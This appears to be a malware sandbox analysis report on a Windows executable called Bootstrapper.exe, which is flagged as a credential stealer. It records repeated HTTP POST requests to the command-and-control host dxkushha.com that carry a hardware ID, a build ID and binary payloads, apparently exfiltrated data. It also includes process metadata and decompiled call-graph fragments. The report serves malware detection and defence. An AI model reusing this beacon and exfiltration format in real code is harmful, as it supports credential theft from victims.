                                                                              2024-12-27 02:36:15 UTC270OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=7HM2AQP1HV
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18122
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:15 UTC15331OUTData Raw: 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43
                                                                              Data Ascii: --7HM2AQP1HVContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--7HM2AQP1HVContent-Disposition: form-data; name="pid"2--7HM2AQP1HVContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--7HM2AQP1HVC
                                                                              2024-12-27 02:36:15 UTC2791OUTData Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15
                                                                              Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                              2024-12-27 02:36:16 UTC1119INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=rars05shj73fhv8q1oldpa5nh4; expires=Mon, 21 Apr 2025 20:22:55 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIHaQ1EUORAY1FafX4l1kesWL%2F8Fbuvpy1VIgYlrcLW8NRJUhC2hRhH1JV6hXuTzJOP8QDbPOmR9dWL5Ztt7rzn0eSQuUiKh1HNOB1PUQ7FfcxcuVsWf3eJjkzcnI4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec041f2d0f36-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1476&rtt_var=610&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2829&recv_bytes=19072&delivery_rate=1715628&cwnd=231&unsent_bytes=0&cid=58c70205a5a31a24&ts=1702&x=0"
                                                                              2024-12-27 02:36:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 02:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449775104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:18 UTC275OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=2A1X3JYWD4641FBF
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8779
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:18 UTC8779OUTData Raw: 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34
                                                                              Data Ascii: --2A1X3JYWD4641FBFContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--2A1X3JYWD4641FBFContent-Disposition: form-data; name="pid"2--2A1X3JYWD4641FBFContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
                                                                              2024-12-27 02:36:19 UTC1121INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7v46u8j0cqmijcnsapenf99ll9; expires=Mon, 21 Apr 2025 20:22:57 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjYw9EliyXrlVzQXiI8AIHIwpHj%2FKvNwJ68Mi3c47f0YJK8Qk0VCG1Yqlr1m4RSXp1kQH%2Bk2uEA88dxNGmxE7FzYqIqxkwpECFAQHgnRoNQzsj3fK1P%2BmylYTdMJIY0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec176e8e42d2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1589&rtt_var=616&sent=9&recv=15&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9712&delivery_rate=1749550&cwnd=227&unsent_bytes=0&cid=13442d1b404637d4&ts=885&x=0"
                                                                              2024-12-27 02:36:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 02:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449782104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:20 UTC272OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=2RNF2ZJJLTQP
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20408
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:20 UTC15331OUTData Raw: 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 32 52 4e 46 32 5a 4a
                                                                              Data Ascii: --2RNF2ZJJLTQPContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--2RNF2ZJJLTQPContent-Disposition: form-data; name="pid"3--2RNF2ZJJLTQPContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--2RNF2ZJ
                                                                              2024-12-27 02:36:20 UTC5077OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                              2024-12-27 02:36:21 UTC1117INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=tsvgpa8sf8ltl4f2igegujtr0n; expires=Mon, 21 Apr 2025 20:23:00 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4X8Jt5JUQ0e2Eyy2L0f99umKxCjdxdiI7N8wNuF9g2gE3NOsgsuhdSx4sz7wPdd28w1uD9rXT2fhaQcz0V7RRd79NwQUuJ47eLSBhnVlvrWBHPTTWamxaAfCLIHbo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec270a2e43ee-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=644&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21360&delivery_rate=1696687&cwnd=230&unsent_bytes=0&cid=3d5fe34d31ef0d2d&ts=978&x=0"
                                                                              2024-12-27 02:36:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 02:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449788104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:23 UTC275OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=QU6DXMH6BWG9JUMV
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1215
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:23 UTC1215OUTData Raw: 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34
                                                                              Data Ascii: --QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="pid"1--QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
                                                                              2024-12-27 02:36:24 UTC1122INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=sks2mevbtkgd91b7s8h7f7rl3f; expires=Mon, 21 Apr 2025 20:23:03 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gBPplwDJSroufP94Azm4xNPALj4PFJNG%2Bzz0ekVfTuecWuCHZUvgV%2BMcewijAhBuxp7GYp2En1aNbmc%2F2C02l3g%2BOuX55Oi1Aj6i5esiNnYGNCV86PuJ2P0o9uSlTFg%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec3a2e730f36-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1620&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2126&delivery_rate=1497435&cwnd=231&unsent_bytes=0&cid=dcdf80ada0780f0b&ts=829&x=0"
                                                                              2024-12-27 02:36:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 02:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449794104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:26 UTC276OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=PJW7FN57LZBCQB0W8
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1112
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:26 UTC1112OUTData Raw: 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                              Data Ascii: --PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="pid"1--PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                              2024-12-27 02:36:27 UTC1121INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=12pogfs4ntgg5k1hqsp9j2ch4q; expires=Mon, 21 Apr 2025 20:23:05 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gINzzvpygUouy96lJdRKgMnt8MKqNvcfubTeNFMaZG1%2BHsJrTwy9UxONDMTxxCQwVdf4u6SPb%2BxNUO4zum1b6oE%2BxhWzDfrLSDfjV0VeYcjgE82BBXRwZWneBdKlZ5A%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec481bfd42d2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1652&rtt_var=757&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2024&delivery_rate=1767554&cwnd=227&unsent_bytes=0&cid=e4af67e1bb5338c6&ts=1367&x=0"
                                                                              2024-12-27 02:36:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 02:36:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449801104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:28 UTC261OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 121
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:28 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32
                                                                              Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=F25800254124FBA138ACDDE148F97B32
                                                                              2024-12-27 02:36:29 UTC1118INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=rvseom0arkhuaec1715jec3ja6; expires=Mon, 21 Apr 2025 20:23:08 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEuKKknKq02suJgyx4vRmO7tYN3pKoQfXRR5ZbAcUUyQpyI7lSTyoZgzSFZmaNY%2BOPLMRMLAJ5P8HGHk3Ek9Vh%2BVXF4jItn8PlBACwO6jv2Kjur7AQ0kFEPREkgd1s%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ec592a008c0f-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2038&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1018&delivery_rate=1403846&cwnd=220&unsent_bytes=0&cid=e3d69ba0d5cecc87&ts=783&x=0"
                                                                              2024-12-27 02:36:29 UTC54INData Raw: 33 30 0d 0a 71 37 45 41 75 44 76 54 45 69 37 56 41 47 37 78 4a 43 43 34 6d 4a 42 32 5a 63 75 66 50 72 32 78 46 30 73 70 70 6e 69 7a 58 52 44 77 37 41 3d 3d 0d 0a
                                                                              Data Ascii: 30q7EAuDvTEi7VAG7xJCC4mJB2ZcufPr2xF0sppnizXRDw7A==
                                                                              2024-12-27 02:36:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Target ID:0
                                                                              Start time:21:34:59
                                                                              Start date:26/12/2024
                                                                              Path:C:\Users\user\Desktop\Bootstrapper.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Bootstrapper.exe"
                                                                              Imagebase:0x720000
                                                                              File size:1'003'520 bytes
                                                                              MD5 hash:FF6C56326F0EE63CA9360576A7449FF5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:1.5%
                                                                                Dynamic/Decrypted Code Coverage:9.8%
                                                                                Signature Coverage:13.9%
                                                                                Total number of Nodes:772
                                                                                Total number of Limit Nodes:12
                                                                                execution_graph 9448 734470 9450 73453e 9448->9450 9449 7364dc 9451 734748 9450->9451 9453 73638b GetCurrentThread GetProcessHeap GetProcessHeap GetCurrentProcessId 9450->9453 9451->9449 9452 736bea 8 API calls 9451->9452 9452->9449 9453->9451 9454 780670 9456 78067e _strlen 9454->9456 9455 7806bf 9456->9455 9457 78070d 9456->9457 9459 780717 __aligned_msize 9456->9459 9462 780620 9457->9462 9460 78073b __crt_unique_heap_ptr 9459->9460 9461 780620 3 API calls 9460->9461 9461->9455 9465 780640 9462->9465 9468 780600 9465->9468 9471 7920c0 9468->9471 9474 785190 9471->9474 9473 780610 9473->9455 9479 797620 EnterCriticalSection 9474->9479 9476 7851c9 ___free_lconv_num 9480 786260 9476->9480 9478 78520c ___free_lconv_num 9478->9473 9479->9476 9484 78628c ___free_lconv_num 9480->9484 9481 786292 ___free_lconv_num __aligned_msize 9481->9478 9482 7865c6 __aligned_msize 9487 79b350 9482->9487 9484->9481 9484->9482 9485 78662d __aligned_msize 9484->9485 9485->9481 9486 79b350 ___free_lconv_num 2 API calls 9485->9486 9486->9481 9488 79b35e ___free_lconv_num 9487->9488 9491 79b35c 9487->9491 9489 79b36d HeapFree 9488->9489 9490 79b37b GetLastError 9489->9490 9489->9491 9490->9491 9491->9481 9915 78c570 9918 78c530 